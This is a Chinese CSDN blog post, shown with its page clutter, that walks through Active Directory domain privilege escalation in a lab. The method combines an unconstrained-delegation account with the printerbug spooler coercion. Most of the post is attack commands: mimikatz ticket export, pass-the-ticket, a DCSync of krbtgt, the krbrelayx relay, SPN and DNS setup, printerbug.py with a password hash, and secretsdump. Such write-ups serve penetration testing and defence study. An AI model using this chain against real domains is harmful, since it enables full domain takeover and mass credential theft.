非约束委派账户配合printerbug域内提权

最新推荐文章于 2023-09-09 09:40:18 发布
最新推荐文章于 2023-09-09 09:40:18 发布
阅读量818 收藏 4
点赞数
分类专栏: 内网蠕动 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/118762916
版权

非约束委派账户配合printerbug域内提权

环境搭建

主机机器名ip用户版本
域控ad.test.com192.168.164.147administratorwin2012r2
域内机器user.test.com192.168.164.129user1win2008r2

配置非约束委派

在这里插入图片描述

漏洞复现

本地

https://github.com/leechristensen/SpoolSample/.

https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

因为这里环境是win2008 默认不支持.net4.0,所以安装一个…实际环境需要参考下面的远程方法
fixed

SpoolSample.exe ad user
# 前面为域控,后面为机器

抓取票据

mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述
可以看到在最下面已经抓到域控机器的tgt票据
导入票据

mimikatz "privilege::debug" "kerberos::ptt [0;103619]-2-0-60a10000-AD$@krbtgt-TEST.COM.kirbi" "exit"

导出hash

mimikatz "lsadump::dcsync /domain:test.com /user:krbtgt /csv" "exit"

在这里插入图片描述

远程

这种情况需要获得一个具有非约束委派账号(可以添加spn)并且有一个linux机器
工具地址

https://github.com/dirkjanm/krbrelayx

配置账号权限,可以添加spn

创建非约束委派账户
首先给这个用户配置spn

setspn.exe -U -A VNC/comp.test.com user1

之后配置账户非约束委派
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

第一种情况

有一个linux机器,但是无windows机器,这时候的密码一般是爆破或者社工来的

添加spn
python3 addspn.py -u "test.com\user1" -p "Uu1234." -s host/linux.test.com 192.168.164.147

坑点,这里要用host
在这里插入图片描述

添加dns记录
python3 dnstool.py -u "test.com\user1" -p Uu1234. -r linux.test.com  -a add -d 192.168.164.128 192.168.164.147
#192.168.164.128为linux主机ip后面为域控ip

在这里插入图片描述

开启中继
python3 krbrelayx.py -p "Uu1234." -s TEST.COMuser1

在这里插入图片描述

触发回连
python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d linux.test.com

在这里插入图片描述

利用tgt

在/etc/hosts文件中添加如下两行记录用于解析域名

192.168.164.147 ad.test.com
192.168.164.147 test.com

使用票据导出hash

export KRB5CCNAME=xxx.ccache
python3 /root/impacket/examples/secretsdump.py -k ad.test.com -just-dc-user administrator

第二种情况

有一个linux,也有windows机器,

python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d user.test.com
#user.test.com是回连的地址

抓取票据

mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述
剩下的票据利用就和前面一样了

参考文章

https://docs.microsoft.com/zh-cn/dotnet/api/system.func-3?view=netframework-3.5
https://mp.weixin.qq.com/s/aM2k01N6_H5FOxoEyj39LA
https://blog.csdn.net/a3320315/article/details/106511098

whojoe
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全】安全漏洞之使用PetitPotam代替Printerbug
2201_75857562的博客
02-06 235
安全漏洞之使用PetitPotam代替Printerbug
安全|约束委派攻击 & Exchange 2013的安装
weixin_42282189的博客
01-13 3724
作者: 0xYyy 免责声明:本文仅供学习研究,严禁从事法活动,任何后果由使用者本人负责。 写在前面 此文章其实可以分为两篇,只不过为了让大家更好的在本地测试的情况下,堪称保姆级别指导来安装exchange 2013(为了除printbug方法外)利用PrivExchange 方法在内进行横向移动or攻击控。 为了在本地完美复现国外安全研究员Dirk-jan Mollema博客中的 "Relaying" Kerberos - Having fun with unconstrained deleg.
内横向渗透-委派攻击之约束委派攻击
m0_62783065的博客
09-24 248
内横向渗透-委派攻击之约束委派攻击,介绍了约束委派的原理和其复现方法
结合CVE-2019-1040漏洞的两种提权利用深度分析
systemino的博客
07-03 4054
0x00 漏洞概述 2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量中继到目标服务器。PHP大马 通过这种攻击使得攻击者在仅有一个普通账号的情况下可以远程控制 Windows 内的任何机器,包括控服务器。 0x01 漏洞利...
rubeus+spoolsample.zip渗透约束委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,约束委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于...
AD委派后门详解-1
06-19
本文将详细介绍三种类型的委派,以及攻击者如何利用这些委派进行约束委派攻击、约束委派攻击和基于资源的约束委派攻击。 1. **约束委派攻击** 约束委派允许服务账号在任何地方代表用户进行身份验证,而不...
实例分析JVM安全体系双亲委派命名空间保护策略Java开
11-25
为了保障程序的安全性,JVM设计了一套严谨的安全体系,其中“双亲委派命名空间保护策略”是关键的一环。本实例分析将深入探讨这一策略,帮助开发者更好地理解和应用Java开发中的安全机制。 首先,让我们理解...
活动目录加入权限委派.docx
09-27
活动目录加入权限委派 活动目录加入权限委派是指在Active Directory中,将计算机加入的权限委派给特定的用户或组,以便他们可以管理和维护中的计算机对象。这种权限委派可以提高中的安全性和管理...
xiaoy-sec#Pentest_Note#账户委派1
07-25
### 账户受限委派设置用户y为服务账户(服务账户委派权限)>setspn -U -A variant/golden y查询受限委派内账号,使用powe
一文带你了解NTLM Realy 攻击
最新发布
dzqxwzoe的博客
09-09 222
NTLM Realy 攻击其实应该称为Net-NTLM Realy 攻击,它发生在NTLM认证的第三步,在Response 消息中存在Net-NTLMHash,当攻击者获得了 Net-NTLM Hash 后,可以重放Net-NTLM Hash 进行中间人攻击。NTLM Realy 流程如图所示,攻击者作为中间人在客户端和服务器之间转发NTLM认证数据包,从而模拟客户端身份访问服务端的资源。NTLM Relay 攻击分为两步:第一步是捕获 Net-NTLM Hash;
AD CS证书服务中继攻击
网络安全。
03-05 3864
0x1 简介 AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。 注:借图 0x2 环境信息 控(windows server 2016):192.168.3.129 辅控(windows server 2016):192.168.3.131(AD CS) 内主机(windows 10):192.168.3.171 攻击机(kali):192.168.3.158 搭建ADCS证书服务:https://mp.
渗透测试 | 详解ADCS证书服务攻击手法
MachineGunJoe666
06-13 574
该漏洞产生的主要原因是ADCS服务器在处理计算机模板证书时是通过机器的dNSHostName属性来辨别用户的,而普通用户即有权限修改它所创建的机器账户dNSHostName属性,因此恶意攻击者可以创建一个机器账户,然后修改它的dNSHostName属性为控的dNSHostName,然后去请求计算机模板的证书。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。在这种层次结构下,根CA给子从属CA颁发的证书认证,子从属CA给下面的应用颁发和管理证书,根CA不直接给应用颁发证书。
Kerberos中继攻击:滥用无约束委派(下)
systemino的博客
10-10 1039
上一篇文章,我只讲了中继攻击的基本理论,这篇文章,我会举两个示例来及具体说明。 示例1:使用计算机帐户和SpoolService漏洞获取DC同步权限 在第一种情况下,我们将滥用我的internal.corp实验室中的计算机帐户的无约束委派权限。通过攻击用户testuser获得了此主机的管理权限,该用户是该主机上Administrators组的成员。我们将按照上面列出的步骤,首先获取Kerbe...
NTLMRelay的利用
Ms08067安全实验室
09-06 863
0x00 相关概念NTLM hash 和 Net-NTLM hash1、NTLM hash是指Windows系统下Security Account Manager中保存的用户密码hash。该hash的生成方法:复制将明文口令转换成十六进制的格式 转换成Unicode格式,即在每个字节之后添加0x00 对Unicode字符串作MD4加密,生成32位的十六进制数字串2、Net-NTLM hash是指网...
使用PetitPotam代替Printerbug
ZAWX_NETSTARSEC的博客
08-19 365
使用PetitPotam代替Printerbug 上帝关了一扇, 必定会再为你打开另一扇窗 0x00 前言 Printerbug使得拥有控制用户/计算机的攻击者可以指定内的一台服务器,并使其对攻击者选择的目标进行身份验证。虽然不是一个微软承认的漏洞,但是跟Net-ntlmV1,约束委派,NTLM_Relay,命名管道模拟这些手法的结合可以用来提权,本地提权,跨等等利用。 遗憾的是,在PrintNightmare爆发之后,很多企业会选择关闭spoolss服务,使得Printerbug失效。在P
利用CVE-2019-1040 - 结合RCE和Domain Admin的中继漏洞
weixin_30521161的博客
06-14 535
0x00 前言 在本周之前,微软发布了针对CVE-2019-1040的补丁,这是一个允许绕过NTLM身份验证中继攻击的漏洞。这个漏洞是由Marina Simakov和Yaron Zinar(以及微软咨询公司的其他几位成员)发现的,他们在这里发表了一篇关于该漏洞的漏洞细节。该漏洞允许绕过NTLM身份验证中的消息完整性。然而,如果与Lee Christensen发现的打印机Bug以...
ldaps客户端使用委派账户修改密码,提示密码被拒绝
07-07
### 回答1: 当ldaps客户端使用委派账户修改密码时,如果出现密码被拒绝的提示,可能是由于以下几个原因: 1. 错误的凭据:首先,我们要确保在委派账户中输入的密码是正确的。密码可能因为键入错误或者被更改而导致被拒绝。 2. 访问权限限制:另一个可能的原因是委派账户没有足够的访问权限来修改密码。在LDAP服务器上,有可能设置了访问控制列表(ACL)或者权限策略,限制了委派账户对用户密码的修改操作。需要检查并确保委派账户具有足够的权限来执行这个操作。 3. 无法连接到LDAP服务器:第三个可能的原因是ldaps客户端无法正确连接到LDAP服务器。这可能是由于网络问题、服务器故障或者客户端配置错误引起的。需要确认网络连接是否畅通,并通过正确的主机名、端口号和协议(如LDAPS)来配置客户端。 4. 密码策略限制:最后一个可能的原因是LDAP服务器的密码策略限制。密码策略可能要求密码满足一定的复杂性要求,例如长度、包含字母、数字和特殊字符等。如果委派账户设置的新密码不符合这些要求,服务器可能会拒绝修改密码请求。 在解决这个问题时,我们可以按照以下步骤进行操作: 1. 验证委派账户的凭据是否正确。 2. 检查委派账户的访问权限设置,确保具有足够的权限来修改密码。 3. 检查ldaps客户端的网络配置,确保可以正确连接到LDAP服务器。 4. 确认密码策略要求,并根据需要修改委派账户的新密码。 如果问题仍然存在,可以进一步检查服务器日志以获取更详细的错误信息,或者联系LDAP服务器管理员获取帮助。 ### 回答2: 当ldaps客户端使用委派账户修改密码时,如果提示密码被拒绝,可能有以下几个原因: 1. 权限不足:委派账户可能没有足够的权限来修改密码。在Active Directory(AD)环境中,修改密码需要特定的权限,例如"Reset Password"或"Change Password"权限。需要确保委派账户具有足够的权限来执行密码修改操作。 2. 密码策略限制:AD中的密码策略可能会对密码修改提出一些限制。例如,密码长度、复杂度、历史纪录等要求。如果委派账户的密码不符合这些要求,密码修改将被拒绝。需要确保委派账户的密码满足AD的密码策略要求。 3. 连接问题:ldaps客户端与LDAP服务器之间的连接可能存在问题。例如,权限设置、证书配置、网络连接等方面的问题都可能导致密码修改被拒绝。需要确保ldaps客户端与LDAP服务器之间的连接正常,权限和证书配置正确。 4. 密码已过期:如果委派账户的密码已经过期,密码修改将被拒绝。需要确保委派账户的密码处于有效状态。 针对以上问题,可以通过以下方法来解决: 1. 验证委派账户的权限,并确保具有足够的权限来修改密码。 2. 检查密码策略,并确保委派账户的密码符合AD的密码策略要求。 3. 检查ldaps客户端和LDAP服务器之间的连接设置,并确保连接正常。 4. 如果委派账户的密码已过期,尝试修改密码后再进行密码修改操作。 5. 如果问题仍然存在,可以尝试重新配置ldaps客户端和LDAP服务器之间的连接,并检查所有相关的配置项。 综上所述,当ldaps客户端使用委派账户修改密码时,如果提示密码被拒绝,原因可能是权限不足、密码策略限制、连接问题或密码已过期。需要仔细检查并解决相应的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值